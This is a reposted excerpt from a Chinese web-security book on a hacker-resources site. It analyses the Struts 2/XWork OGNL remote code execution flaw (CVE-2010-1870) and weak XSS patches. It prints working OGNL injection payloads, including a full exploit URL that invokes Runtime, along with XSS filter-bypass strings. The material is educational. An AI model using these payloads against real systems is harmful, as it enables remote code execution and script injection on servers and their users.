当前位置:免费黑客网-黑客技术,黑客工具,黑客联盟,黑客基地,黑客网站,黑客论坛DDOS黑客技术黑客入侵
日期:2016-04-26 10:58:39  来源:网络

Web框架自身安全

下面讲到的几个,都是一些流行的Web开发框架曾经出现过的严重漏洞。研究这些案例,可以帮助我们更好地理解框架安全,在使用开发框架时更加的小心,同时让我们不要迷信于开发框架的权威。Struts 2命令执行漏洞2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。这个漏洞的细节描述公布在exploit-db[1]上。在这里简单摘述如下:XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:user.address.city=Bishkek&user['favoriteDrink']=kumys会被转化成:action.getUser().getAddress().setCity("Bishkek")action.getUser().setFavoriteDrink("kumys")这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。* Method calling: foo()* Static method calling: @java.lang.System@exit(1)* Constructor calling: new MyClass()* Ability to work with context variables: #foo = new MyClass()* And more...由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)* SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)但这两个方法可以被覆盖,从而导致代码执行。#_memberAccess['allowStaticMethodAccess'] = true#foo = new java .lang.Boolean("false")#context['xwork.MethodAccessor.denyMethodExecution'] = #foo#rt = @java.lang.Runtime@getRuntime()#rt.exec('mkdir /tmp/PWNED')ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.* #root* #this* #_typeResolver* #_classResolver* #_traceEvaluations* #_lastEvaluation* #_keepLastEvaluation可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。http://www.2cto.com /MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1最终导致代码执行成功。Struts 2的问题补丁Struts 2官方目前公布了几个安全补丁[2]:Struts 2官方的补丁页面但深入其细节不难发现,补丁提交者对于安全的理解是非常粗浅的。以S2-002的漏洞修补为例,这是一个XSS漏洞,发现者当时提交给官方的POC只是构造了script标签。http://localhost/foo/bar.action?<script>alert(1)</script>test=hello我们看看当时官方是如何修补的:新增的修补代码:可以看到,只是简单地替换掉<script> 标签。于是有人发现,如果构造<<script>>,经过一次处理后会变为<script>。漏洞报告给官方后,开发者再次提交了一个补丁,这次将递归处理类似<<<<script>>>>的情况。修补代码仅仅是将if变成while:这种漏洞修补方式,仍然是存在问题的,攻击者可以通过下面的方法绕过:http://localhost/foo/bar.action?<script test=hello>alert(1)</script>由此可见,Struts 2的开发者,本身对于安全的理解是非常不到位的。本文节选自《白帽子讲Web安全》一书。图书详细信息:http://bvbroadview.blog.51cto.com/addblog. 本文章原创来源:http://www.hackwd.com/

Tags:[db:关键词]

作者:Hacker

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接- 网站地图
Copyright © 2015-2016 Hackwd.Com. All Rights Reserved .
本站内容来源网络收集,仅供用于黑客技术安全学习参考,请遵守相关法律法规
打造国内最大的黑客技术资源免费发布站
提供最权威的黑客攻防教程,黑客安全工具
免费黑客网-黑客技术,黑客工具,黑客联盟,黑客基地,黑客网站,黑客论坛